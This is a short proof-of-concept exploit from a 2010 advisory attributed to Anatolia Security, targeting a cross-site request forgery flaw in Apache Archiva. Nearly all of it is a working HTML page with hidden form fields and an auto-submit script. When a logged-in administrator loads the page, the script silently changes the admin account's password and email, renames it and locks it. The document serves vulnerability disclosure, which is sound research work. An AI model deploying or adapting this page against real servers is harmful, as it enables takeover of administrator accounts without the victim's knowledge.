ANATOLIA SECURITY (c) 2010 -*-*-

$ Title: Proof of Concept Code for Apache Archiva CSRF
$ ADV-ID: 2010-001
$ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
$ Technical Details: http://www.anatoliasecurity.com

* PoC created by Eliteman 
~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com
~ web: elite.anatoliasecurity.com

-->
<html>
<head>
<title> Apache Archiva CSRF PoC </title>
</head>
<body>
<form id="userEditForm" name="useredit" action="http://archiva:8080/archiva/security/useredit.action" method="post">
  <input type="hidden" name="user.username" value="admin" id="userEditForm_user_username"/>
  <input type="hidden" name="user.fullName" value="OWNED0DAY" id="userEditForm_user_fullName"/>
  <input type="hidden" name="user.email" value="0day@zer0day.com" id="userEditForm_user_email"/>
  <input type="hidden" name="user.password" value="1337owned" id="userEditForm_user_password"/>
  <input type="hidden" name="user.confirmPassword" value="1337owned" id="userEditForm_user_confirmPassword"/>
  <input type="hidden" name="user.locked" value="true" id="userEditForm_user_locked"/>
  <input type="hidden" name="__checkbox_user.locked" value="true" />
  <input type="hidden" name="user.passwordChangeRequired" value="true" id="userEditForm_user_passwordChangeRequired"/>
  <input type="hidden" name="__checkbox_user.passwordChangeRequired" value="true" />
  <input type="hidden" name="username" value="admin" id="userEditForm_username"/>
  <input type="hidden" id="userEditForm__submit" name="method:submit" value="Update"/>
</form>
<script type="text/javascript">
  document.forms[0].submit();
</script>
</body>
</html>